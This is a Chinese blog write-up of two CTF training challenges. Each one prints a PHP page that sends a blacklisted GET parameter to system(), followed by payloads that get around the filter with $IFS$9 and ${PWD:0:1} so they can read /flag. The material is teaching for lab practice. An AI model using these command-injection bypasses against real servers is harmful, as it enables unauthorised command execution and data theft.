no_good_file(训练题)

最新推荐文章于 2024-05-20 20:42:03 发布
最新推荐文章于 2024-05-20 20:42:03 发布
阅读量232 收藏 9
点赞数 5
分类专栏: CTF windows linux 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asdfaa/article/details/125938769
版权
linux 同时被 3 个专栏收录
12 篇文章 0 订阅
订阅专栏
windows
8 篇文章 0 订阅
订阅专栏
CTF
7 篇文章 0 订阅
订阅专栏

[题目信息]:

题目名称题目难度
no_good_file(训练题)2

[题目考点]:

远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

以下是可能会造成任意命令执行的函数

system|passthru|exec|popen|proc_open|move_uploaded_file|eval|copy|shell_exec|assert

[Flag格式]:

SangFor{CEFHCp-i7vPT1RpytkTOaNqlTutti6Xk}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:5019

[题目writeup]:

1、实验主页

2、代码分析

 <?php
    highlight_file(__FILE__);
    $cmd=$_GET['cmd'];
    $str1='/';
    $str2='..';
    $str3='|';
    $str4=' ';
    $str5='&';
    $str5='@';
    $str6='!';
    $str7='+';
    $str8='>';
    $str9='(';
    $str10='\\';
    $str11='^';
    if((strstr($cmd,$str1)) || (strstr($cmd,$str2)) || (strstr($cmd,$str3)) || (strstr($cmd,$str4)) || (strstr($cmd,$str5)) || (strstr($cmd,$str6)) || (strstr($cmd,$str7)) || (strstr($cmd,$str8))|| (strstr($cmd,$str9))|| (strstr($cmd,$str10))|| (strstr($cmd,$str11))){
        exit("quit!!!!");
    }
    if (!empty($cmd)){
    echo "<pre>";
    system($cmd);
    echo "<pre>";
    }else{
        echo "</br>Please enter the Command! </br>";
    }
?>

代码较长,主要分析核心代码;

  1. 用户通过get方式传递参数值
  2. 提示flag位于"/flag",但禁用了两个关键符号,"/"、":“以及”…";
  3. 如果通过waf后,会执行system()函数;

因为没有过滤.号,可以通过命令拼接构造…;以及利用cd …命令不断返回上一层,到达"/"目录,执行cat flag

payload

cmd=a=.;b=.;cd$IFS$9$a$b;cd$IFS$9$a$b;cd$IFS$9$a$b;cat$IFS$9flag

题目信息]:

题目名称题目难度
NoNumberFile(环境变量利用)2

[题目考点]:

远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

以下是可能会造成任意命令执行的函数

system|passthru|exec|popen|proc_open|move_uploaded_file|eval|copy|shell_exec|assert

[Flag格式]:

SangFor{rMU4PSrW6Uu-m1CS5TCqEvCOhD8NShzo}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:5018

[题目writeup]:

1、实验主页

2、代码分析

<?php
    ini_set("display_errors", "On");
    error_reporting(E_ALL | E_STRICT);
    //flag in /flag
    highlight_file(__FILE__);
    $cmd=$_GET['cmd'];
    $str1='/';
    $str2='.';
    $str3='|';
    $str4=' ';
    $str5='&';
    $str5='@';
    $str6='!';
    $str7='+';
    $str8='>';
    $str9='(';
    $str10='\\';
    $str11='^';
    $str12='cd';
    if((strstr($cmd,$str1)) || (strstr($cmd,$str2)) || (strstr($cmd,$str3)) || (strstr($cmd,$str4)) || (strstr($cmd,$str5)) || (strstr($cmd,$str6)) || (strstr($cmd,$str7)) || (strstr($cmd,$str8))|| (strstr($cmd,$str9))|| (strstr($cmd,$str10))|| (strstr($cmd,$str11)) ||(strstr($cmd,$str12))){
        exit("quit!!!!");
    }
    if (!empty($cmd)){
    echo "<pre>";
    echo $cmd;
    system($cmd);
    echo "<pre>";
    }else{
        echo "</br>Please enter the Command! </br>";
    }

?>

代码较长,主要分析核心代码;

  1. 用户通过get方式传递参数值
  2. 提示flag位于"/flag",但禁用了两个关键符号,"/",以及".";
  3. 如果通过waf后,会执行system()函数;

其他大多数绕过方式我们已经接触过了,例如本题目禁用得空格符号,我们可以使用$IFS$9、${IFS}、>等进行绕过;那么对于/符号该如何绕过呢;

内置环境变量利用

$PWD 是个系统变量

pwd 是linux 自带的命令. 全称: pathname of the current working directory.

从图中可以看出,${PWD:0:1}类似sql语句中mid,substr等截断函数,”0“表示截取位置为第一个字符,”1“表示截取长度为1;

${PWD:0:1} <==> “/”

payload

先执行

?cmd=cat$IFS$9${PWD%3a0%3a1}flag

疯狂小伟哥
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pytorch 通用训练代码讲解(very good)
@bangbang的博客
01-14 386
网络从0开始的训练效果会很差,因为权值太过随机,特征提取效果不明显,因此非常、非常、非常不建议大家从0开始训练!还有,如果你用了cuda,别忘了cuda的随机数种子。,在实际的项目中也经常使用到B导仓库的代码,再次对B导表示敬意,本博客主要对其中训练代码进行解读,对应为。具体来说,每次更新参数时,会对模型参数进行EMA处理,从而。此外,EMA还可以用于计算滑动平均梯度,用于优化器的更新,,用的学习率,迭代次数,batch size 都是一样?的代码,写的简介明了,对于初学者。
plc.rar_PLC_plc file
09-14
plc文件,可以看看! plc文件,可以看看!
python训练识别库_jTessBoxEditor训练识别库
weixin_39606638的博客
12-18 455
1、背景前文已经简要介绍tesseract ocr引擎的安装及基本使用,其中提到使用-l eng参数来限定语言库,可以提高识别准确率及识别效率。本文将针对某个网站的验证码进行样本训练,形成自己的语言库,来提高验证码识别率。2、准备工具总结一下:1、工具2 java虚拟机Ver 1.8.0_91 64位版本 (oracle官网)2、工具1 jtessboxeditorVer 1.5版本 (jtess...
生成对抗网络训练_生成对抗网络
weixin_26731327的博客
08-31 2743
生成对抗网络训练深度学习(Deep Learning) 什么是生成对抗网络(GAN)?(What are Generative Adversarial Networks (GANs)?) Designed by Ian Goodfellow and his colleagues in 2014, GANs consist of two neural networks that are traine...
Keras Yolo_MobileNet训练自己的数据
weixin_38106878的博客
06-21 3731
前言: 最近在做一个小的project,要用到小模型。所以,特此尝试了一下用Mobilenet进行相关的模型训练,以及将模型转换成pb格式。本文中,部分代码已做简单的修改,具体修改请看正文部分。 同时,本次模型训练只针对了一类目标进行检测,多类目标的训练请自行修改相关部分代码(其实只需要修改name.txt文件即可)。 由于本人之前写过部分博客,为了精简本文的内容,部分步骤与之前的博客有重复,所以...
训练 gpt2_用您自己的语言训练gpt 2
weixin_26720761的博客
09-09 2894
训练 gpt2We all know modern day Natural Language Processing (NLP) has progressed by leaps and bounds in the past couple of years following the development of attention networks and transformers. It pav...
TensorFlow学习笔记:Retrain Inception_v3(一)
tongxiaomo的博客
12-05 1143
转:http://www.jianshu.com/p/613c3b08faea 0. 概要 最新的物体识别模型可能含有数百万个参数,将耗费几周的时间去完全训练。因此我们采用迁移学习的方法,在已经训练好的模型(基于ImageNet)上调整部分参数,以实现对新类别的分类。关于迁移学习的理论,可以参考DeCAF: A Deep Convolutional Activation Feature fo
PyTorch:模型训练、评估和预测
热门推荐
皮皮blog
10-21 1万+
模型训练、评估和预测。
pat考前模拟_2019-2020真
mumuzxy的博客
03-14 1463
文章目录写在前面pat考前模拟2019春季2019秋季2019冬季2020春季2020秋季2020冬季 写在前面 昨天的pat2021春季甲级考试得了98分,不用考第二次了~敲开心:D 能得这个分数除了靠刷库,还得益于考前模拟,每天抽出三小时实战演练,摸清自己的做速度、训练自己在紧张的状态下答,真正上考场就“不怕不怕啦”~ 因为2019-2020的目在PTA需要付费,所以自己整理了一下,写完看下别人的解就能大概知道自己做对了没有,当然只过样例点不能保证代码完全正确,不过模拟的意义已经达到了。 p
ib_logfile0
03-30
ib_logfile0ib_logfile0ib_logfile0
EX.rar_Encrypt_encrypt file_ex
09-22
NOR 加密兼容任何文件。NOR is compatible with any file encryption
新文字文件_NoGood_C++_
10-02
this file is no good.please don't download.
TGA_File_Format.rar_tga_tga file form
09-24
介绍TGA文件格式的材料,详细介绍了TGA文件格式的二进制格式
Linux网络编程:网络基础
最新发布
weixin_73234157的博客
05-20 490
当我们形成计算机网络后,小明要给他的暗恋对象小红发一句“我喜欢你”,结果发给了小芳……,在计算机网络中会出现许许多多的主机,当我们进行网络通信时,我们要通过协议来找到指定的接收方。同理在单台主机中,数据从键盘中读入再转载到当前网卡也是需要协议的。简单来说:协议就是一种约定当计算机在读取数据时,发现数据中存在向网卡输送的标志(协议)时,就往网卡输送。当网卡读取到输送给小红,网卡就不会发送给小芳。
力控7.2与宏电通过内网连接UDP+DDP
xkyby1992的专栏
05-17 938
本文主要介绍力控7.2与宏电通过内网连接UDP+DDP的指导文档
netstat协议
lovemelovefish的博客
05-15 381
本机各端口的网络连接情况。
Linux:网络管理命令之ss
hhd1988的专栏
05-17 807
Linux:网络管理命令之ss
0基础如何进入IT行业
2302_76516899的博客
05-19 540
IT(Information Technology,信息技术)行业涵盖了与计算机技术相关的所有领域。主要包括软件开发、硬件维护、网络架构、数据库管理、网络安全、云计算和人工智能等。了解这些领域的基本概念和发展趋势是进入IT行业的第一步。
worker_rlimit_nofile 默认值
05-16
在 Nginx 中,worker_rlimit_nofile 指令用于设置每个 worker 进程能够打开的最大文件描述符数量。默认情况下,worker_rlimit_nofile 的值为系统默认值,一般是 1024。这意味着每个 Nginx worker 进程最多只能同时打开 1024 个文件描述符。如果需要打开更多的文件描述符,可以通过修改 worker_rlimit_nofile 的值来实现。需要注意的是,修改 worker_rlimit_nofile 的值需要在 Nginx 配置文件中的 http 块中进行,而不是在 server 块中。另外,修改 worker_rlimit_nofile 的值可能会影响系统性能,因此需要谨慎考虑。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值